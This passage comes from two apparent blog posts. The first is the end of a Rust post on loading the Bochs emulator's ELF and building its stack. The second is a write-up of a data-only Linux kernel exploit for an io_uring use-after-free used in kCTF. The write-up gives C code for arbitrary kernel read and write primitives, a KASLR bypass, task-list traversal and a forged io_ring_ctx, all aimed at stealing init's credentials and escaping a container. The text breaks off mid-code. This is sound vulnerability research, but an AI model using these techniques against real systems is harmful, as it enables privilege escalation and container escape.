0x7fffffffe0f0:	0x00007fffffffe4a2	0x00007fffffffe4b9
0x7fffffffe100:	0x00007fffffffe4e5	0x00007fffffffe505
0x7fffffffe110:	0x00007fffffffe52e	0x00007fffffffe542
0x7fffffffe120:	0x00007fffffffe559	0x00007fffffffe56c
0x7fffffffe130:	0x00007fffffffe588	0x00007fffffffe59d
0x7fffffffe140:	0x00007fffffffe5b8	0x00007fffffffe5c5
0x7fffffffe150:	0x00007fffffffe5da	0x00007fffffffe60e
0x7fffffffe160:	0x00007fffffffe61d	0x00007fffffffe646
0x7fffffffe170:	0x00007fffffffe667	0x00007fffffffe674
0x7fffffffe180:	0x00007fffffffe67d	0x00007fffffffe68d
0x7fffffffe190:	0x00007fffffffe69b	0x00007fffffffe6ad
0x7fffffffe1a0:	0x00007fffffffe6be	0x00007fffffffeca0
0x7fffffffe1b0:	0x00007fffffffecc1	0x00007fffffffeccd
0x7fffffffe1c0:	0x00007fffffffecde	0x00007fffffffed34
0x7fffffffe1d0:	0x00007fffffffed63	0x00007fffffffed73
0x7fffffffe1e0:	0x00007fffffffed8b	0x00007fffffffedad
0x7fffffffe1f0:	0x00007fffffffedc4	0x00007fffffffedd8
0x7fffffffe200:	0x00007fffffffedf8	0x00007fffffffee02
0x7fffffffe210:	0x00007fffffffee21	0x00007fffffffee2c
0x7fffffffe220:	0x00007fffffffee34	0x00007fffffffee46
0x7fffffffe230:	0x00007fffffffee65	0x00007fffffffee7c
0x7fffffffe240:	0x00007fffffffeed1	0x00007fffffffef7b
0x7fffffffe250:	0x00007fffffffef8d	0x00007fffffffefc3
0x7fffffffe260:	0x0000000000000000	0x0000000000000021
0x7fffffffe270:	0x00007ffff7f2e000	0x0000000000000033
0x7fffffffe280:	0x0000000000000e30	0x0000000000000010
0x7fffffffe290:	0x000000001f8bfbff	0x0000000000000006
0x7fffffffe2a0:	0x0000000000001000	0x0000000000000011
0x7fffffffe2b0:	0x0000000000000064	0x0000000000000003
0x7fffffffe2c0:	0x00007ffff7f30040	0x0000000000000004
0x7fffffffe2d0:	0x0000000000000038	0x0000000000000005
0x7fffffffe2e0:	0x000000000000000c	0x0000000000000007

You can see the towards the end of the data at 0x7fffffffe2d8 we can see the key 0x5, and at 0x7fffffffe2e0 we can see the value 0xc which is 12 in hex. We need some of these in order to load our ELF properly as the ELF _start routine requires some of them in order to set the environment up properly. The ones I included on my stack were the following, they might not all be necessary:

AT_ENTRY which holds the program entry point,
AT_PHDR which is a pointer to the program header data,
AT_PHNUM which is the number of program headers,
AT_RANDOM which is a pointer to 16-bytes of a random seed, which is supposed to be placed by the kernel. This 16-byte value serves as an RNG seed to construct stack canary values. I found out that the program we load actually does need this information because I ended up with a NULL-ptr deref during my initial testing and then placed this auxp pair with a value of 0x4141414141414141 and ended up crashing trying to access that address. For our purposes, we don’t really care that the stack canary values are crytographically secure, so I just placed another pointer to the program entry as that is guaranteed to exist.
AT_NULL which is used to terminate the auxiliary vector

So with those values all accounted for, we now know all of the data we need to construct the program’s stack.

Allocating the Stack

First, we need to allocate memory to hold the Bochs stack since we will need to know the address it’s mapped at in order to formulate our pointers. We will know offsets within a vector representing the stack data, but we won’t know what the absolute addresses are unless we know ahead of time where this stack is going in memory. Allocating the stack was very straightforward as I just used mmap the same way we did with the program segments. Right now I’m using a 1MB stack which seems to be large enough.

Constructing the Stack Data

In my stack creation logic, I created the stack starting from the bottom and then inserting values on top of the stack.

So the first value we place onto the stack is the “end-marker” from the diagram which is just a 0u64 in Rust.

Next, we need to place all of the strings we need onto the stack, namely our command line arguments. To separate command line arguments meant for the fuzzer from command line arguments meant for Bochs, I created a command line argument --bochs-args which is meant to serve as a delineation point between the two argument categories. Every argument after --bochs-args is meant for Bochs. I iterate through all of the command line arguments provided and then place them onto the stack. I also log the length of each string argument so that later on, we can calculate their absolute address for when we need to place pointers to the strings in the argv vector. As a sidenote, I also made sure that we maintained 8-byte alignment throughout the string pushing routine just so we didn’t have to deal with any weird pointer values. This isn’t necessary but makes the stack state easier for me to reason about. This is performed with the following logic:

// Create a vector to hold all of our stack data
let mut stack_data = Vec::new();

// Add the "end-marker" NULL, we're skipping adding any envvar strings for
// now
push_u64(&mut stack_data, 0u64);

// Parse the argv entries for Bochs
let args = parse_bochs_args();

// Store the length of the strings including padding
let mut arg_lens = Vec::new();

// For each argument, push a string onto the stack and store its offset 
// location
for arg in args.iter() {
    let old_len = stack_data.len();
    push_string(&mut stack_data, arg.to_string());

    // Calculate arg length and store it
    let arg_len = stack_data.len() - old_len;
    arg_lens.push(arg_len);
}

Pushing strings is performed like this:

// Pushes a NULL terminated string onto the "stack" and pads the string with 
// NULL bytes until we achieve 8-byte alignment
fn push_string(stack: &mut Vec<u8>, string: String) {
    // Convert the string to bytes and append it to the stack
    let mut bytes = string.as_bytes().to_vec();

    // Add a NULL terminator
    bytes.push(0x0);

    // We're adding bytes in reverse because we're adding to index 0 always,
    // we want to pad these strings so that they remain 8-byte aligned so that
    // the stack is easier to reason about imo
    if bytes.len() % U64_SIZE > 0 {
        let pad = U64_SIZE - (bytes.len() % U64_SIZE);
        for _ in 0..pad { bytes.push(0x0); }
    }

    for &byte in bytes.iter().rev() {
        stack.insert(0, byte);
    }
}

Then we add some padding and the auxiliary vector members:

// Add some padding
push_u64(&mut stack_data, 0u64);

// Next we need to set up the auxiliary vectors, terminate the vector with
// the AT_NULL key which is 0, with a value of 0
push_u64(&mut stack_data, 0u64);
push_u64(&mut stack_data, 0u64);

// Add the AT_ENTRY key which is 9, along with the value from the Elf header
// for the program's entry point. We need to calculate 
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 9u64);

// Add the AT_PHDR key which is 3, along with the address of the program
// headers which is just ELF_HDR_SIZE away from the base
push_u64(&mut stack_data, (base + ELF_HDR_SIZE) as u64);
push_u64(&mut stack_data, 3u64);

// Add the AT_PHNUM key which is 5, along with the number of program headers
push_u64(&mut stack_data, elf.program_headers.len() as u64);
push_u64(&mut stack_data, 5u64);

// Add AT_RANDOM key which is 25, this is where the start routines will 
// expect 16 bytes of random data as a seed to generate stack canaries, we
// can just use the entry again since we don't care about security
push_u64(&mut stack_data, elf.elf_header.entry + base as u64);
push_u64(&mut stack_data, 25u64);

Then, since we ignored the environment variables, we just push a NULL pointer onto the stack and also the NULL pointer terminating the argv vector:

// Since we skipped ennvars for now, envp[0] is going to be NULL
push_u64(&mut stack_data, 0u64);

// argv[n] is a NULL
push_u64(&mut stack_data, 0u64);

This is where I spent a lot of time debugging. We now have to add the pointers to our arguments. To do this, I first calculated the total length of the stack data now that we know all of the variable parts like the number of arguments and the length of all the strings. We have the stack length as it currently exists which includes the strings, and we know how many pointers and members we have left to add to the stack (number of args and argc). Since we know this, we can calculate the absolute addresses of where the string data will be as we push the argv pointers onto the stack. We calculate the length as follows:

// At this point, we have all the information we need to calculate the total
// length of the stack. We're missing the argv pointers and finally argc
let mut stack_length = stack_data.len();

// Add argv pointers
stack_length += args.len() * POINTER_SIZE;

// Add argc
stack_length += std::mem::size_of::<u64>();

Next, we start at the bottom of the stack and create a movable offset which will track through the stack stopping at the beginning of each string so that we can calculate its absolute address. The offset represents how deep into the stack from the top we are. At first, the offset is the largest value it can be because it’s at the bottom of the stack (higher-memory address). We subtract from it in order to point us towards the beginning of each argv string we pushed onto the stack. So the bottom of the stack looks something like this:

NULL
string_1
string_2
end-marker <--- offset

So armed with the arguments and their lengths that we recorded, we can adjust the offset each time we iterate through the argument lengths to point to the beginning of the strings. There is one gotcha though, on the first iteration, we have to account for the end-marker and its 8-bytes. So this is how the logic goes:

// Right now our offset is at the bottom of the stack, for the first
// argument calculation, we have to accomdate the "end-marker" that we added
// to the stack at the beginning. So we need to move the offset up the size
// of the end-marker and then the size of the argument itself. After that,
// we only have to accomodate the argument lengths when moving the offset
for (idx, arg_len) in arg_lens.iter().enumerate() {
    // First argument, account for end-marker
    if idx == 0 {
        curr_offset -= arg_len + U64_SIZE;
    }
    
    // Not the first argument, just account for the string length
    else {
        curr_offset -= arg_len;
    }
    
    // Calculate the absolute address
    let absolute_addr = (stack_addr + curr_offset) as u64;

    // Push the absolute address onto the stack
    push_u64(&mut stack_data, absolute_addr);
}

It’s pretty cool! And it seems to work? Finally we cap the stack off with argc and we are done populating all of the stack data in a vector. Next, we’ll want to actually copy the data onto the stack allocation which is straightforward so no code snippet there.

The last piece of information I think worth noting here is that I created a constant called STACK_DATA_MAX and the length of the stack data cannot be more than that tunable value. We use this value to set up RSP when we jump to the program in memory and start executing. RSP is set so that it is at the absolute lowest address possible, which is the stack allocation size - STACK_DATA_MAX. This way, when the stack grows, we have left the maximum amount of slack space possible for the stack to grow into since the stack grows down in memory.

Executing the Loaded Program

Everything at this point should be setup perfectly in memory and all we have to do is jump to the target code and start executing. For now, I haven’t fleshed out a context switching routine or anything we’re literally just going to jump to the program and execute it and hope everything goes well. The code I used to achieve this is very simple:

pub fn start_bochs(bochs: Bochs) {
    // Set RAX to our jump destination which is the program entry, clear RDX,
    // and set RSP to the correct value
    unsafe {
        asm!(
            "mov rax, {0}",
            "mov rsp, {1}",
            "xor rdx, rdx",
            "jmp rax",
            in(reg) bochs.entry,
            in(reg) bochs.rsp,
        );
    }
}

The reason we clear RDX is because if the _start routine sees a non-zero value in RDX, it will interpret that to mean that we are attempting to register a hook located at the address in RDX to be invoked when the program exits, we don’t have one we want to run so for now we NULL it out. The other register values don’t really matter. We move the program entry point into RAX and use it as a long jump target and we supply our handcrafted RSP so that the program has a stack to use to do its relocations and run properly.

dude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[17:43:19] lucid> Loading Bochs...
[17:43:19] lucid> Bochs loaded { Entry: 0x19F50, RSP: 0x7F513F11C000 }
Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
dude@lol:~/lucid/target/release$

The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…

Will Bochs Run?

We have to see right? First we have to compile Bochs as a -static-pie ELF which was a headache in itself, but I was able to figure it out.

ude@lol:~/lucid/target/release$ ./lucid --bochs-args -AAAAA -BBBBBBBBBB
[12:30:40] lucid> Loading Bochs...
[12:30:40] lucid> Bochs loaded { Entry: 0xA3DB0, RSP: 0x7FEB0F565000 }
========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
00000000000p[      ] >>PANIC<< command line arg '-AAAAA' was not understood
00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1

Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.

Next Steps

The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.

After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.

Resources

I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: https://fasterthanli.me/series/making-our-own-executable-packer/part-17.
Also shoutout @netspooky for helping me understand the stack layout!
Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)

Code

https://github.com/h0mbre/Lucid

Escaping the Google kCTF Container with a Data-Only Exploit

The Human Machine Interface

h0mbre

29 July 2023 at 04:00

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an fd as an argument and tracing through them looking for calls to copy_to_user, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend @Firzen14 and he brought up this concept here: https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9. In the P0 blogpost, they talk about how the signalfd_ctx of a signalfd file is stored in the f.file->private_data field and how the signalfd syscalls allows the attacker to perform a write of the ctx->sigmask. So in our situation, since we control the entire fake file contents, forging a fake signalfd_ctx in memory would be quite easy since we have access to an entire page of memory.

I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the private_data field of our struct file. So at this point, I went hunting for usages of private_data in the kernel code base. As you can see, the member is used in many many places: https://elixir.bootlin.com/linux/latest/C/ident/private_data.

This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at io_uring itself.

Looking for instances where the file->private_data was used, I quickly found an instance right in the very function that was related to the bug. In io_msg_ring, you can see that a target_ctx of type io_ring_ctx is derived from the req->file->private data. Since we control the fake file, we control can control the private_data contents (a pointer to a fake io_ring_ctx in this case).

io_msg_ring is used to pass data from one io ring to another, and you can see that in io_fill_cqe_aux, we actually retrieve a io_uring_cqe struct from our potentially faked io_uring_ctx via io_get_cqe. Immediately, we see several WRITE_ONCE macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.

Immediately after the call to io_fill_cqe_aux, there is one to io_commit_cqring using our faked io_uring_ctx:

static inline void io_commit_cqring(struct io_ring_ctx *ctx)
{
	/* order cqe stores with ring update */
	smp_store_release(&ctx->rings->cq.tail, ctx->cached_cq_tail);
}

This is basically a memcpy, we write the contents of ctx->cached_cq_tail (100% user-controlled) to &ctx->ring->cq.tail (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.

Exploitation Plan

Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.

I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. This post from Cyberark was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s blog post on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.

Finding Init

At this point, my goal is to find the host Init task_struct in memory and find the value of a few important members: real_cred, cred, and nsproxy. real_cred is used to track the user and group IDs that were originally responsible for creating the process and unlike cred, real_cred remains constant and does not change due to things like setuid. cred is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, nsproxy is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our task_struct. Luckily, the address of the init task is a constant offset from the kernel base, so once we broke KASLR with our read of the error_entry address, we can then copy those values with our arbitrary read capability since they would reside at known addresses (offsets from the init task symbol).

Forging Objects

With those values in hand, we now need to find our own task_struct in memory so that we can overwrite our members with those of init. To do this, I took advantage of the fact that the task_struct has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name, this name fits within the task_struct comm field, and so as I traverse through the linked list of tasks on the system, I just simply check each task’s comm field for my easily identifiable child process. You can see how I do that in this code snippet:

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember that we need to fake a few objects in memory, like the io_uring_ctx for instance. Usually this done by crafting objects in the kernel heap and somehow discoverying their address with a leak. In my case, I have a whole pipe buffer which is 4096 bytes of memory to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a file descriptor table inside of its files member. After some time printk some offsets, I was able to traverse through my own task’s file descriptor table and learn the address of my pipe buffer. This is because the pipe buffer page is obviously page aligned so I can just page align the address we read from the file descriptor table as the address of our UAF file. So now I know exactly in memory where my pipe buffer is, and I also know what offset onto that page our UAF struct file resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake io_uring_ctx. You can see those functions here, first finding our pipe buffer address:

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

And then determining the location of our scratch space where we will forge the fake io_uring_ctx:

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

Now we have one more read to do and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake io_uring_ctx contains as many valid fields as necessary. If you start with a completely NULL object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real io_uring_ctx instead by reading and copying its contents to a global buffer. Working now from a good base, our forged object can then be set-up properly to perform our arbitrary write from, you can see me using the copy and updating the necessary fields here:

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

Performing Our Writes

Now, it’s time to do our writes. Remember those three sequential writes we were going to use inside of io_fill_cqe_aux, but I said they wouldn’t work with the exploit plan? Well the reason was, those three writes were as follows:

cqe = io_get_cqe(ctx);
	if (likely(cqe)) {
		WRITE_ONCE(cqe->user_data, user_data);
		WRITE_ONCE(cqe->res, res);
		WRITE_ONCE(cqe->flags, cflags);

